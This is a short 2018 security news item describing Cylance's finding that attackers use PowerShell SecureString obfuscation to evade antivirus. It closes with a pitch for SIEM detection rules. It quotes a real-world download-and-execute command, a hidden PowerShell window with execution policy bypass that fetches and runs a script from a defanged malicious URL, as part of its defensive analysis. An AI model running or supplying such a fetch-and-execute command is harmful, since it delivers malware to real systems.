Delaware, USA – September 14, 2018 — Adversaries are constantly improving their techniques and tools to remain undetected by common security solutions. Researchers from Cylance published the blog post about a new tactic used by adversaries to bypass antiviruses and infect users with well-known malware. In the newly discovered sample, adversaries leverage SecureString for PowerShell obfuscation, and this allows them to bypass almost all known antivirus programs. They analyzed malicious archive contained PDF and VBS script with the obfuscated first layer using Base64 encoding. The script conducts the next attack step executing the command with the following switches: “PowersheLl -windowstyle hidden -noexit -executionpolicy bypass -command IEX(New-Object Net.Webclient)DownloadString.Invoke(‘hxxp://ravigel[dot]com/1cr[dot]dat’)”
The downloaded script is encrypted with SecureString, and it used to bypass automated sandboxes, download and install the long-known Espionage tool, which is also not detected by IOC-based antivirus solutions.
Attackers abuse PowerShell scripts to perform a number of actions, including the discovery of information and execution of code. It is almost impossible to detect the execution of obfuscated malicious scripts by antivirus tools. If Sysmon or CrowdStrike are not installed on the system to log commands, attackers can execute any commands using even the simplest backdoor and remain under the radar. To discover the different methods of PowerShell abuse, you can use SIEM rules from Threat Detection Marketplace; the platform contains 126 rules to detect various PowerShell attacks: https://tdm.socprime.com/